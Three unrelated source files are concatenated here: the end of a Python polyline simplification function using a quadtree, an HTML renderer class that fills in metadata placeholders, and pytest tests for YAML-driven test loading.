    reached.  A vertex is only removed when no other indexed point lies on
    the triangle it would collapse (the "postbox principle" below).

    :param line: LineString-like sequence of points; must support indexing,
        ``len()`` and expose an ``srid`` attribute.
    :param pp: planar partition; must expose ``quadtree.range_search(rect)``
        and ``quadtree.remove(pt)`` (interface inferred from usage here --
        TODO confirm against the planar-partition implementation).
    :param tolerance: largest measure that may still be simplified away.
    :param DEBUG: when True, dumps intermediate WKT files to /tmp and
        pauses for keyboard input.
    :return: tuple of (simplified LineString with the same srid, measure of
        the first vertex that was *not* removed; +inf when none remains).
    """
    # FIXME: Do we need an additional step to split a polyline
    # in 2 pieces when it is a loop? Will lead to different simplification at
    # least
    #
    # Doubly linked list over vertex indices: prv[i] / nxt[i] give the
    # neighbouring vertices of i that are still part of the line.
    prv = [None] * len(line)
    nxt = [None] * len(line)
    for i in range(len(line)):
        prv[i] = i - 1
        nxt[i] = i + 1
    # first does not have prv and
    # last does not have nxt
    prv[0] = None
    nxt[-1] = None
    # measures for points
    # first and last do not get any measure
    # Priority queue: vertex index -> effective measure (smallest popped first).
    oseq = pqdict.PQDict()
    for i in range(1, len(line) - 1):
        size = area(line[prv[i]], line[i], line[nxt[i]])
        base = dist(line[prv[i]], line[nxt[i]])
        if base == 0:
            # degenerate base (neighbours coincide): never pick this vertex
            eps = float("inf")
        else:
            eps = size / (0.5 * base)
        oseq[i] = eps
    # FIXME:
    # loops can also be formed by 2 edges,
    # that can end up 'on top' of each other
    is_loop = line[0] == line[-1]
    remaining_ct = len(line)
    measure = float("inf")
    while oseq:
        idx, measure, = oseq.popitem()
        # print('try removing {}'.format(line[idx]))
        if measure > tolerance:
            break
        if is_loop and remaining_ct <= 4:
            # we need 4 points in a loop edge, no further simplification
            # set measure to +inf, preventing from picking this edge again for
            # simplification
            measure = float("inf")
            break
        # FIXME: temporary stop criterion, always keep 3 points in any edge
        # rationale: areas keep some size with 3 (non-collinear) points
        # although no guarantees on collinearity, reduces chance
        # on face collapsing into line (degeneracy)
        if remaining_ct <= 3:
            measure = float("inf")
            break
        # -- check if the triangle is empty
        ### print prv[idx], idx, nxt[idx]
        start, mid, end = line[prv[idx]], line[idx], line[nxt[idx]]
        if DEBUG: # True:
            with open("/tmp/triangle_pts.wkt", "w") as fh:
                fh.write("wkt\n")
                output_points([start, mid, end], fh)
        # rectangle that lies around this triangle
        xmin = min(start[0], min(mid[0], end[0]))
        xmax = max(start[0], max(mid[0], end[0]))
        ymin = min(start[1], min(mid[1], end[1]))
        ymax = max(start[1], max(mid[1], end[1]))
        rect = [(xmin, ymin), (xmax, ymax)]
        if DEBUG: # True:
            with open("/tmp/rect.wkt", "w") as fh:
                fh.write("wkt\n")
                fh.write(
                    """POLYGON(({xmin} {ymin}, {xmax} {ymin}, {xmax} {ymax}, {xmin} {ymax}, {xmin} {ymin}))\n""".format(
                        xmin=xmin, ymin=ymin, xmax=xmax, ymax=ymax
                    )
                )
        # by means of the quadtree we find overlapping points
        # the number of overlapping points can already tell us something:
        #
        # if we find exactly 3, this triangle is empty, no need to check
        # the points
        # - however, it depends on the topological config with other edges
        # whether it is safe to remove the vertex -> end points that form
        # base of triangle, which also is an edge --> problematic to remove
        # (area collapse of triangle) -- two edges form a loop
        #
        # if we find less than 3, there is a problem
        # - either this is a degenerate line (with multiple vertices on same
        # location) -> should be solved while reading the data
        # - or there exists a problem/bug with the quadtree/keeping it up to date
        # -> point not added in the tree, or the intersection method is
        # not performing ok...
        #
        # if there is more than 3 points, we could potentially introduce
        # intersection between segments, check if these points lie on interior
        # of triangle that will be collapsed if we remove the point, if not
        # then it is safe to remove the vertex from the polyline
        # (postbox principle)
        skip = False
        overlapping_pts = pp.quadtree.range_search(rect)
        # overlapping_pts = pp.kdtree.range_search(*rect)
        if DEBUG: #
            def do_debug():
                with open("/tmp/overlapping.wkt", "w") as fh:
                    fh.write("wkt\n")
                    output_points(overlapping_pts, fh)
                with open("/tmp/quadtree_pts.wkt", "w") as fh:
                    fh.write("wkt\n")
                    output_points([pt for pt in pp.quadtree], fh)
            do_debug()
        # A point belonging to the triangle's own corners is fine; any other
        # indexed point on the triangle makes the removal unsafe.
        for pt in overlapping_pts:
            if (
                (pt[0] == start[0] and pt[1] == start[1])
                or (pt[0] == mid[0] and pt[1] == mid[1])
                or (pt[0] == end[0] and pt[1] == end[1])
            ):
                continue
            elif on_triangle(pt, start, mid, end):
                skip = True
                break
        if DEBUG: #
            print(f"skip := {skip} ")
            input("debugging line")
        if skip:
            continue
        # -- really remove vertex from the line
        pp.quadtree.remove((mid[0], mid[1]))
        remaining_ct -= 1
        # make sure we only simplify interior points, and not end points
        # get neighbouring points
        prvidx = prv[idx]
        nxtidx = nxt[idx]
        indices = []
        if prvidx != 0:
            indices.append(prvidx)
        if nxtidx != len(line) - 1:
            indices.append(nxtidx)
        #
        # for idx in indices:
        # oseq.pop(idx)
        # link up previous and nxt vertex
        nxt[prvidx] = nxtidx
        prv[nxtidx] = prvidx
        # update measures for those left and right
        for i in indices:
            assert 0 < i < len(line), "out of bounds: {0} {1}".format(i, len(line))
            size = area(line[prv[i]], line[i], line[nxt[i]])
            base = dist(line[prv[i]], line[nxt[i]])
            if base == 0:
                eps = float("inf")
            else:
                eps = size / (0.5 * base)
            oseq[i] = eps
        if DEBUG:
            input("paused after simplify")
        if remaining_ct == 2:
            measure = float("inf")
    # Walk the surviving linked list from the first vertex to rebuild the line.
    simplified = []
    simplified.append(line[0])
    nxtidx = nxt[0]
    assert nxtidx is not None
    while nxtidx is not None:
        simplified.append(line[nxtidx])
        nxtidx = nxt[nxtidx]
    return LineString(simplified, line.srid), measure
def _test():
    """Ad-hoc smoke test for simplify().

    NOTE(review): these calls look stale -- simplify() now takes a planar
    partition (``pp``) as its second positional argument and reads
    ``line.srid``, so the first call raises TypeError (missing ``pp``) and
    the second passes the tolerance ``2`` where ``pp`` is expected.
    TODO: update or remove.
    """
    simplify([(0, 0), (10, 0)])
    print((simplify([(0, 0), (5, 5), (7, 0), (10, 0)], 2)))
if __name__ == "__main__":
    _test()
|
<reponame>cariad/edition
from html.parser import HTMLParser
from io import StringIO
from logging import getLogger
from sys import stdout
from typing import IO, Callable, Dict, List, Optional, Tuple
from edition.html import get_css
from edition.metadata import Metadata
TAttribute = Tuple[str, Optional[str]]
class EditionHtmlRenderer(HTMLParser):
    """Streams HTML through, resolving ``<edition ...>`` placeholders.

    Markup is written to the bound writer mostly verbatim, with three
    exceptions visible in this class:

    * ``<edition value="KEY" />`` self-closing elements are replaced by the
      metadata value for ``KEY`` (optionally wrapped in ``element="..."``),
      except inside ``<pre>`` where they are emitted literally,
    * ``edition-*`` attributes on ordinary elements are rewritten to their
      metadata values; ``edition-if`` suppresses the element entirely when
      the referenced value is empty,
    * the pseudo-keys ``favicon-href`` and ``toc`` are computed rather than
      looked up.
    """

    def __init__(
        self,
        metadata: Optional[Metadata] = None,
        toc_writer: Optional[Callable[[IO[str], int, int], None]] = None,
    ) -> None:
        """
        Args:
            metadata: Source of values for ``<edition>`` lookups.  When
                ``None``, every lookup resolves to the empty string.
            toc_writer: Callback ``(writer, hi, lo)`` that renders a table
                of contents; required only when the document uses
                ``<edition value="toc" />``.
        """
        super().__init__()
        self._logger = getLogger("edition")
        self._metadata = metadata
        self._toc_writer = toc_writer
        # Output target; replaced for the duration of each render() call.
        self._writer: IO[str] = stdout
        # Most recent character data seen (currently informational only).
        self._last_data: str = ""
        # Stack of currently-open tags; the most recently opened tag is
        # kept at index 0 (see handle_starttag / handle_endtag).
        self._path: List[str] = []

    def handle_comment(self, data: str) -> None:
        """
        Handles HTML comments encountered in the feed.
        """
        # We intentionally pass comments through since they could be present
        # inside Markdown code blocks. We only escape the brackets to ensure the
        # comments make it through subsequent HTML processing.
        self._writer.write("<!--")
        self._writer.write(data)
        self._writer.write("-->")

    def handle_data(self, data: str) -> None:
        """Pass character data through unchanged."""
        self._writer.write(data)
        self._last_data = data

    def handle_decl(self, decl: str) -> None:
        """Pass declarations (e.g. ``DOCTYPE html``) through unchanged."""
        self._writer.write(f"<!{decl}>")

    def handle_endtag(self, tag: str) -> None:
        """Close the innermost open element and emit its end tag."""
        # Bug fix: handle_starttag() pushes new tags with insert(0), so the
        # innermost open tag lives at index 0.  The previous plain pop()
        # removed the item at the *end* of the list (the outermost tag),
        # letting _path drift out of sync with the actually-open elements
        # and potentially corrupting the '"pre" in self._path' check in
        # handle_startendtag().
        self._path.pop(0)
        self._writer.write(f"</{tag}>")

    def _get_attrs(self, attrs: List[TAttribute]) -> Dict[str, str]:
        """Convert the parser's (name, value) pairs into a dict of strings."""
        wip: Dict[str, str] = {}
        for a in attrs:
            wip[str(a[0])] = str(a[1])
        return wip

    def _get_value(self, key: str, attributes: Dict[str, str]) -> str:
        """Resolve *key* to its replacement text.

        ``favicon-href`` and ``toc`` are computed pseudo-keys; anything
        else is looked up in the metadata.  Returns "" (and logs a warning
        for plain keys) when no value is available.
        """
        if not self._metadata:
            return ""

        if key == "favicon-href":
            # Build a data-URI SVG favicon from the "favicon-emoji" value.
            if emoji := self._get_value("favicon-emoji", attributes):
                return f"data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text y=%22.9em%22 font-size=%2290%22>{emoji}</text></svg>"
            return ""

        if key == "toc":
            if not self._toc_writer:
                raise Exception("no toc writer")
            writer = StringIO()
            # "hi"/"lo" bound the heading levels included in the TOC.
            hi = int(attributes.get("hi", 1))
            lo = int(attributes.get("lo", 6))
            self._toc_writer(writer, hi, lo)
            return writer.getvalue().rstrip()

        value = str(self._metadata.get(key, ""))
        if not value:
            self._logger.warning('No "%s" metadata.', key)
        return value

    def handle_startendtag(self, tag: str, attrs: List[TAttribute]) -> None:
        """Handle self-closing elements, resolving ``<edition />`` placeholders."""
        edition_attrs = self._get_attrs(attrs)
        attributes = self.make_attributes(attrs) if attrs else ""
        inner = f"{tag} {attributes}".strip()

        if tag == "edition":
            if "pre" in self._path:
                # Inside <pre>, show the placeholder literally instead of
                # resolving it (e.g. for documentation samples).
                self._writer.write(f"<{inner} />")
            else:
                if "value" in edition_attrs:
                    value = self._get_value(edition_attrs["value"], edition_attrs)
                    element = edition_attrs.get("element", None)
                    if element:
                        self._writer.write("<")
                        self._writer.write(element)
                        self._writer.write(">")
                        self._writer.write(value)
                        self._writer.write("</")
                        self._writer.write(element)
                        self._writer.write(">")
                    else:
                        self._writer.write(value)
            return

        if if_key := edition_attrs.get("edition-if", None):
            if_value = self._get_value(if_key, edition_attrs)
            if not if_value:
                # Don't write anything:
                return

        self._writer.write(f"<{inner} />")

    def handle_starttag(self, tag: str, attrs: Optional[List[TAttribute]]) -> None:
        """Open an element: push it on the tag stack and emit the start tag."""
        self._path.insert(0, tag)
        attributes = self.make_attributes(attrs) if attrs else ""
        inner = f"{tag} {attributes}".strip()
        self._writer.write(f"<{inner}>")

    def make_attribute(
        self,
        attribute: TAttribute,
        value_attributes: Dict[str, str],
    ) -> str:
        """Render one attribute, resolving ``edition-*`` names via metadata.

        ``edition-if`` itself renders to "" because it only controls whether
        the element is emitted at all (see handle_startendtag).
        """
        if attribute[0].startswith("edition-"):
            key_suffix = attribute[0][8:]

            if key_suffix == "if":
                return ""

            metadata_key = str(attribute[1])
            attribute = (
                key_suffix,
                str(self._get_value(metadata_key, value_attributes)),
            )

        return f'{attribute[0]}="{attribute[1]}"'

    def make_attributes(self, attributes: List[TAttribute]) -> str:
        """Render an attribute list to a single space-separated string."""
        value_attributes = self._get_attrs(attributes)
        return " ".join([self.make_attribute(a, value_attributes) for a in attributes])

    def _set_default_metadata(self) -> None:
        """Append the bundled default CSS to the metadata's "css" value.

        Skipped entirely when no metadata is bound; the CSS is only added
        when it is not already present (idempotent across renders).
        """
        if not self._metadata:
            return None
        with get_css() as f:
            existing_css = str(self._metadata.get("css", ""))
            new_css = f.read()
            if new_css not in existing_css:
                self._metadata["css"] = existing_css + "\n" + new_css

    def render(self, reader: IO[str], writer: IO[str]) -> None:
        """Feed *reader* line-by-line through the parser into *writer*."""
        self._set_default_metadata()
        self._writer = writer
        for line in reader:
            self.feed(line)
        self.close()
|
from tests.utils import YAML_EXTENSION
def test_skips_execution_without_arguments(pytester):
    """A test definition without test_data is collected but skipped."""
    definition = """
        ---
        - test_module: tests.base_tests.simple_nuts_annotation
          test_class: TestKeyValue
        """
    pytester.makefile(YAML_EXTENSION, test_class_loading=definition)
    outcome = pytester.runpytest()
    outcome.assert_outcomes(skipped=1)
class TestExecuteTests:
    """Execution of tests driven by YAML-provided test_data."""

    def test_based_on_arguments(self, pytester):
        """Every entry in test_data yields one executed test."""
        definition = """
            ---
            - test_module: tests.base_tests.simple_nuts_annotation
              test_class: TestKeyValue
              test_data: [{"key": "abc","value":"abc"},
            {"key": "cde", "value":"cde"}]
            """
        pytester.makefile(YAML_EXTENSION, test_class_loading=definition)
        outcome = pytester.runpytest()
        outcome.assert_outcomes(passed=2)

    def test_multiple_times_separates_arguments(self, pytester):
        """Repeated entries for the same class keep their own test_data."""
        definition = """
            ---
            - test_module: tests.base_tests.simple_nuts_annotation
              test_class: TestKeyValue
              test_data: [{"key": "abc", "value":"abc"}]
            - test_module: tests.base_tests.simple_nuts_annotation
              test_class: TestKeyValue
              test_data: [{"key": "abc", "value":"bcd"}]
            """
        pytester.makefile(YAML_EXTENSION, test_class_loading=definition)
        outcome = pytester.runpytest()
        outcome.assert_outcomes(passed=1, failed=1)
class TestOptionalAttributes:
    """Behaviour of required versus optional test_data attributes."""

    def test_skips_test_if_attribute_is_missing(self, pytester):
        """A missing required attribute skips the test."""
        definition = """
            ---
            - test_module: tests.base_tests.simple_nuts_annotation
              test_class: TestKeyValue
              test_data: [{"key": "abc"}]
            """
        pytester.makefile(YAML_EXTENSION, test_class_loading=definition)
        outcome = pytester.runpytest()
        outcome.assert_outcomes(skipped=1)

    def test_skips_test_if_non_optional_attribute_is_missing(self, pytester):
        """A missing non-optional attribute skips even an optional-aware class."""
        definition = """
            ---
            - test_module: tests.base_tests.simple_nuts_annotation
              test_class: TestOptionalAttribute
              test_data: [{"key": "abc"}]
            """
        pytester.makefile(YAML_EXTENSION, test_class_loading=definition)
        outcome = pytester.runpytest()
        outcome.assert_outcomes(skipped=1)

    def test_executes_test_if_optional_attribute_is_missing(self, pytester):
        """An absent optional attribute does not block execution."""
        definition = """
            ---
            - test_module: tests.base_tests.simple_nuts_annotation
              test_class: TestOptionalAttribute
              test_data: [{"value": null}]
            """
        pytester.makefile(YAML_EXTENSION, test_class_loading=definition)
        outcome = pytester.runpytest()
        outcome.assert_outcomes(passed=1)

    def test_executes_test_if_any_optional_attribute_is_missing(self, pytester):
        """With several optional attributes, any one may be absent."""
        definition = """
            ---
            - test_module: tests.base_tests.simple_nuts_annotation
              test_class: TestOptionalAttributes
              test_data: [{"value": null}]
            """
        pytester.makefile(YAML_EXTENSION, test_class_loading=definition)
        outcome = pytester.runpytest()
        outcome.assert_outcomes(passed=1)

    def test_executes_test_if_all_optional_attribute_are_missing(self, pytester):
        """All optional attributes may be absent simultaneously."""
        definition = """
            ---
            - test_module: tests.base_tests.simple_nuts_annotation
              test_class: TestOptionalAttributes
              test_data: [{}]
            """
        pytester.makefile(YAML_EXTENSION, test_class_loading=definition)
        outcome = pytester.runpytest()
        outcome.assert_outcomes(passed=1)

    def test_executes_test_if_required_attribute_is_none(self, pytester):
        """A required attribute explicitly set to null still executes."""
        definition = """
            ---
            - test_module: tests.base_tests.simple_nuts_annotation
              test_class: TestKeyValue
              test_data: [{"key": null, "value": null}]
            """
        pytester.makefile(YAML_EXTENSION, test_class_loading=definition)
        outcome = pytester.runpytest()
        outcome.assert_outcomes(passed=1)

    def test_strips_spaced_attribute_names(self, pytester):
        """Attribute names with surrounding spaces are normalised."""
        definition = """
            ---
            - test_module: tests.base_tests.simple_nuts_annotation
              test_class: TestSpacedKeyValue
              test_data: [{"key": null, "value": null}]
            """
        pytester.makefile(YAML_EXTENSION, test_class_loading=definition)
        outcome = pytester.runpytest()
        outcome.assert_outcomes(passed=1)

    def test_single_arguments(self, pytester):
        """A class expecting a single argument runs with one-field test_data."""
        definition = """
            ---
            - test_module: tests.base_tests.simple_nuts_annotation
              test_class: TestSingleValue
              test_data: [{"value": "test"}]
            """
        pytester.makefile(YAML_EXTENSION, test_single_argument=definition)
        outcome = pytester.runpytest()
        outcome.assert_outcomes(passed=1)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.